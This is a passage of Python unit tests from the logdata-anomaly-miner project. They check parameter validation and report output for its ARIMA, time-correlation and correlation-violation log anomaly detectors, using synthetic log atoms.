self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=b"True") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode="True") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=123) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=123.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time={"id": "Default"}) 
self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, 
stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=100) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list="") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=True) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=123) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=123.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=()) self.assertRaises(TypeError, 
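TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=set())
        TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=["file:///tmp/syslog"])

    @classmethod
    def setUpClass(cls):
        """Set up the fixtures shared by all tests of this class.

        Builds a first-match model over the lower-case alphabet, generates 10000
        anomaly-free log atoms with a timestamp increment of 1 and finally fixes the
        random seed (project helper set_random_seed) for the individual tests.
        """
        cls.alphabet = b"abcdefghijklmnopqrstuvwxyz"
        cls.analysis = "Analysis.%s"
        # one fixed-data child per letter, so every generated value is matched by the model
        children = [DummyFixedDataModelElement("value", bytes([val])) for val in cls.alphabet]
        cls.alphabet_model = DummyFirstMatchModelElement("first", children)
        # generate_data only reads class attributes, therefore the class object is passed as `self`
        cls.data = cls.generate_data(cls, 10000, 1)
        # NOTE(review): the seed is set only after generate_data(), so the ids drawn by
        # random.uniform() there vary between runs unless seeded elsewhere; only the
        # test methods themselves run with a reproducible sequence.
        set_random_seed(42)

    def run_tad_test(self, tad, etd, log_atoms):
        """Feed every log atom first to etd and then to the TSAArimaDetector under test.

        @param tad the TSAArimaDetector instance to exercise.
        @param etd the detector tad depends on (presumably an event type detector); it
               must receive each atom before tad does.
        @param log_atoms iterable of LogAtom objects, processed in order.
        Asserts afterwards that tad.arima_models is non-empty.
        """
        for log_atom in log_atoms:
            etd.receive_atom(log_atom)
            tad.receive_atom(log_atom)
        self.assertTrue(tad.arima_models)

    def generate_data(self, iterations, diff):
        """Generate log atoms that contain no anomaly.

        @param iterations number of log atoms to create.
        @param diff value added to the running timestamp before each atom is created.
        @return list of LogAtom objects; each carries a random numeric id (random.uniform,
                not seeded in this method) followed by one letter of self.alphabet,
                cycling through the alphabet with the iteration index.
        """
        log_atoms = []
        t = time.time()
        for i in range(1, iterations + 1):
            char = bytes([self.alphabet[i % len(self.alphabet)]])
            t += diff
            num = str(random.uniform(0, 1000)).encode()
            m1 = MatchElement("/model/id", num, num, None)
            m2 = MatchElement("/model/value", char, char, None)
            parser_match = ParserMatch(MatchElement("/model", num + char, num + char, [m1, m2]))
            # the atom timestamp is one unit ahead of the running counter
            log_atoms.append(LogAtom(num + char, parser_match, t + 1, None))
        return log_atoms


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/TimeCorrelationDetectorTest.py000066400000000000000000000460161500476301700316140ustar00rootroot00000000000000
import unittest
from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummyNumberModelElement, DummyFirstMatchModelElement
from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector
import time
import random
from aminer.input.LogAtom import LogAtom
from aminer.parsing.ParserMatch import ParserMatch
from datetime import datetime


class TimeCorrelationDetectorTest(TestBase):
    """Unittests for the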
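TimeCorrelationDetector."""

    match_context1 = DummyMatchContext(b" pid=")
    fdme1 = DummyFixedDataModelElement("s1", b" pid=")
    match_element1 = fdme1.get_match_element("", match_context1)
    match_context2 = DummyMatchContext(b"25537 uid=2")
    fdme2 = DummyFixedDataModelElement("d1", b"25537")
    match_element2 = fdme2.get_match_element("", match_context2)

    def test1receive_atom(self):
        """Test that log atoms are processed and that correlation reports are emitted on time.

        For parallel_check_count in (1, 2, 10) three detectors are fed 200 atoms: one with
        default matching, one with path matches only and one with value matches only. After
        every record_count_before_event atoms the first detector's report must start with
        the expected header and contain parallel_check_count*(parallel_check_count+1)+4
        lines, the path-only report must not mention "value", the value-only report must
        not mention "hasPath", and between reports no output may be produced.
        """
        expected_string = '%s Correlation report\nTimeCorrelationDetector: "None" (%d lines)\n '
        dtf = "%Y-%m-%d %H:%M:%S"
        t = time.time()
        string = b"ddd 25537 uid=2"
        fdme = DummyFixedDataModelElement("s1", string)
        nme = DummyNumberModelElement("d1")
        fmme = DummyFirstMatchModelElement("f1", [fdme, nme])
        # test different parallel_check_count values
        record_count = 70
        record_count_path = 100
        record_count_value = 50
        for i in [1, 2, 10]:
            tcd = TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], i, record_count_before_event=record_count, max_rule_attributes=1)
            tcd_path = TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], i, record_count_before_event=record_count_path, use_path_match=True, use_value_match=False, max_rule_attributes=5)
            tcd_value = TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], i, record_count_before_event=record_count_value, use_path_match=False, use_value_match=True, max_rule_attributes=15)
            for j in range(1, 201):
                # pick randomly between the fixed string and a plain number
                data = random.choice((string, b"%d" % j))
                match_context = DummyMatchContext(data)
                match_element = fmme.get_match_element("first", match_context)
                log_atom = LogAtom(data, ParserMatch(match_element), t, tcd)
                self.assertTrue(tcd.receive_atom(log_atom))
                # j starts at 1, so an additional `j != 0` guard is not needed
                if j % record_count == 0:
                    self.assertTrue(self.output_stream.getvalue().startswith(expected_string % (datetime.fromtimestamp(t).strftime(dtf), j)))
                    self.assertEqual(self.output_stream.getvalue().count("\n"), i * (i + 1) + 4)
                    self.reset_output_stream()
                self.assertTrue(tcd_path.receive_atom(log_atom))
                if j % record_count_path == 0:
                    self.assertNotIn("value", self.output_stream.getvalue())
                    self.reset_output_stream()
                self.assertTrue(tcd_value.receive_atom(log_atom))
                if j % record_count_value == 0:
                    self.assertNotIn("hasPath", self.output_stream.getvalue())
                    self.reset_output_stream()
                else:
                    # NOTE(review): the else branch belongs to the value-detector check; every
                    # report emitted above was reset, so the stream must be empty here.
                    self.assertEqual(self.output_stream.getvalue(), "")

    def test2validate_parameters(self):
        """Test all initialization parameters for the detector. Input parameters must be validated in the class."""
        self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, ["default"], 2)
        self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, None, 2)
        self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, "", 2)
        self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, b"Default", 2)
        self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, True, 2)
        self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, 123, 2)
        self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, 123.3, 2)
        self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, {"id": "Default"}, 2)
        self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, (), 2)
        self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, set(), 2)
        self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 0)
        self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], -1)
        self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], ["default"])
        self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], None)
        self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config,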
[self.stream_printer_event_handler], "") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], b"Default") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], True) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 123.3) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], set()) self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id="") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id=None) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id=b"Default") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id=True) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id=123) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id=123.22) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id={"id": "Default"}) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id=["Default"]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, 
persistence_id=[]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id=()) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id=set()) TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id="Default") self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event=0) self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event=-1) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event=["default"]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event=None) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event="") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event=b"Default") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event=True) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event=123.3) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event={"id": "Default"}) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event=()) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, 
record_count_before_event=set()) TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event=2) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, output_logline=None) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, output_logline=b"True") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, output_logline="True") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, output_logline=123) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, output_logline=123.22) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, output_logline={"id": "Default"}) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, output_logline=["Default"]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, output_logline=[]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, output_logline=()) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, output_logline=set()) TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], 2, output_logline=True) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_path_match=b"True") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_path_match="True") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, 
[self.stream_printer_event_handler], 2, use_path_match=123) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_path_match=123.22) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_path_match={"id": "Default"}) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_path_match=["Default"]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_path_match=[]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_path_match=()) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_path_match=set()) TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], 2, use_path_match=True) self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match=False, use_path_match=False) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match=b"True") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match="True") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match=123) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match=123.22) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match={"id": "Default"}) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match=["Default"]) 
self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match=[]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match=()) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match=set()) TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match=True) self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=0) self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=-1) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=["default"]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=None) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes="") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=b"Default") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=True) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=123.3) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes={"id": "Default"}) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=()) self.assertRaises(TypeError, TimeCorrelationDetector, 
self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=set()) TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=2) self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes=0) self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes=-1) self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=2, max_rule_attributes=1) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes=["default"]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes=None) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes="") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes=b"Default") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes=True) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes=123.3) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes={"id": "Default"}) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes=()) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes=set()) TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], 2, 
max_rule_attributes=2) TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=1, max_rule_attributes=1) self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, log_resource_ignore_list="") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, log_resource_ignore_list=b"Default") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, log_resource_ignore_list=True) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, log_resource_ignore_list=123) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, log_resource_ignore_list=123.22) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, log_resource_ignore_list=()) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, log_resource_ignore_list=set()) TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], 2, log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/TimeCorrelationViolationDetectorTest.py000066400000000000000000000530021500476301700334740ustar00rootroot00000000000000import unittest import time from aminer.analysis.TimeCorrelationViolationDetector import CorrelationRule, EventClassSelector, TimeCorrelationViolationDetector 
from aminer.analysis import Rules
from aminer.input.LogAtom import LogAtom
from aminer.parsing.ParserMatch import ParserMatch
from unit.TestBase import TestBase, DummyMatchContext, DummySequenceModelElement, DummyFixedDataModelElement, DummyNumberModelElement
from datetime import datetime


class TimeCorrelationViolationDetectorTest(TestBase):
    """Unittests for the TimeCorrelationViolationDetector."""

    def test1receive_atom(self):
        """Pair A-events with B-events under a correlation rule and check the violation reports for: B in time, B too early,
        B too late, more violations than max_violations, mismatching artefact values and a non-checked differing value."""
        expected_string = '%s Correlation rule "%s" violated\nTimeCorrelationViolationDetector: "None" (%d lines)\n '
        expected_string_too_early = expected_string + 'FAIL: B-Event for "%s" (%s) was found too early!\n\n\n'
        expected_string_too_late = expected_string + 'FAIL: B-Event for "%s" (%s) was not found in time!\n\n\n'
        expected_string_different_attributes = expected_string + 'FAIL: "%s" (%s) %d is not equal %d\n\n\n'
        model = "/model"
        dtf = "%Y-%m-%d %H:%M:%S"

        def service_children(value1, numeric_field):
            # Four key/value pairs of the synthetic log line; the pair numbered numeric_field is parsed as a number,
            # all other values are fixed text, with Value1 taken from the argument.
            elements = []
            for index, key_text in enumerate([b"Value1: ", b", Value2: ", b", Value3: ", b", Value4: "], start=1):
                elements.append(DummyFixedDataModelElement("Value%dKey" % index, key_text))
                name = "Value%dValue" % index
                if index == numeric_field:
                    elements.append(DummyNumberModelElement(name))
                else:
                    elements.append(DummyFixedDataModelElement(name, value1 if index == 1 else b"fixed Value%d" % index))
            return elements

        seq1 = DummySequenceModelElement("sequence1", service_children(b"fixed Value1", 2))
        seq2 = DummySequenceModelElement("sequence2", service_children(b"fixed Value1", 3))
        # Same path name as seq2 on purpose: only Value1 differs, which is not part of the artefact match.
        seq3 = DummySequenceModelElement("sequence2", service_children(b"other Value1", 3))
        match_element1 = seq1.get_match_element(
            model, DummyMatchContext(b"Value1: fixed Value1, Value2: 22500, Value3: fixed Value3, Value4: fixed Value4"))
        match_element2 = seq2.get_match_element(
            model, DummyMatchContext(b"Value1: fixed Value1, Value2: fixed Value2, Value3: 22500, Value4: fixed Value4"))
        match_element3 = seq2.get_match_element(
            model, DummyMatchContext(b"Value1: fixed Value1, Value2: fixed Value2, Value3: 22501, Value4: fixed Value4"))
        match_element4 = seq3.get_match_element(
            model, DummyMatchContext(b"Value1: other Value1, Value2: fixed Value2, Value3: 22500, Value4: fixed Value4"))
        t = time.time()
        stamp = datetime.fromtimestamp(t).strftime(dtf)
        a_event = match_element1.match_string.decode()

        def setup(**rule_kwargs):
            # A fresh rule, selectors and detector for every scenario so no state leaks between them.
            cr = CorrelationRule("Correlation", 2, 10, **rule_kwargs)
            ecsa = EventClassSelector("Selector1", [cr], None)
            ecsb = EventClassSelector("Selector2", None, [cr])
            rules = [Rules.PathExistsMatchRule("/model/sequence1/Value2Key", ecsa),
                     Rules.PathExistsMatchRule("/model/sequence2/Value3Key", ecsb)]
            tcvd = TimeCorrelationViolationDetector(self.analysis_context.aminer_config, rules, [self.stream_printer_event_handler])
            return cr, ecsa, tcvd

        def send(detector, element, atom_time):
            detector.receive_atom(LogAtom(element.match_string, ParserMatch(element), atom_time, self))

        # B-events arrive between 2 and 10 seconds after their A-events: no violation.
        cr, ecsa, tcvd = setup()
        iterations = 30
        for i in range(iterations):
            send(tcvd, match_element1, t)
        for i in range(iterations):
            send(tcvd, match_element2, t + 2 + i * 0.1)
        self.assertEqual(self.output_stream.getvalue(), "")

        # B-event one second after A: below the lower bound of the rule.
        cr, ecsa, tcvd = setup()
        send(tcvd, match_element1, t)
        send(tcvd, match_element2, t + 1)
        tcvd.do_timer(t)
        self.assertEqual(self.output_stream.getvalue(), expected_string_too_early % (stamp, cr.rule_id, 1, a_event, ecsa.action_id))
        self.reset_output_stream()

        # B-event 10.1 seconds after A: beyond the upper bound of the rule.
        cr, ecsa, tcvd = setup()
        send(tcvd, match_element1, t)
        send(tcvd, match_element2, t + 10.1)
        tcvd.do_timer(t)
        self.assertEqual(self.output_stream.getvalue(), expected_string_too_late % (stamp, cr.rule_id, 1, a_event, ecsa.action_id))
        self.reset_output_stream()

        # 30 late B-events: the report lists 20 failures and summarises the remaining 10 (max_violations).
        cr, ecsa, tcvd = setup()
        for i in range(iterations):
            send(tcvd, match_element1, t)
        for i in range(iterations):
            send(tcvd, match_element2, t + 11 + i * 0.1)
        tcvd.do_timer(t)
        one_failure = 'FAIL: B-Event for "%s" (%s) was not found in time!\n' % (a_event, ecsa.action_id)
        self.assertEqual(self.output_stream.getvalue(),
                         expected_string % (stamp, cr.rule_id, 1) + one_failure * 20 + "... (10 more)\n\n\n")
        self.reset_output_stream()

        # Value2 of the A-event must equal Value3 of the B-event; 22500 vs 22501 is reported.
        artefacts = [("/model/sequence1/Value2Value", "/model/sequence2/Value3Value")]
        cr, ecsa, tcvd = setup(artefact_match_parameters=artefacts)
        send(tcvd, match_element1, t)
        send(tcvd, match_element3, t + 2)
        tcvd.do_timer(t)
        self.assertEqual(self.output_stream.getvalue(), expected_string_different_attributes % (
            stamp, cr.rule_id, 1, a_event, ecsa.action_id, 22500, 22501))
        self.reset_output_stream()

        # Value1 differs but is not an artefact match parameter: no violation expected.
        cr, ecsa, tcvd = setup(artefact_match_parameters=artefacts)
        send(tcvd, match_element1, t)
        send(tcvd, match_element4, t + 2)
        tcvd.do_timer(t)
        self.assertEqual(self.output_stream.getvalue(), "")

    def test2do_timer(self):
        """do_timer must return the same check interval (10) regardless of the trigger time passed in."""
        cr = CorrelationRule("Correlation", 2, 10)
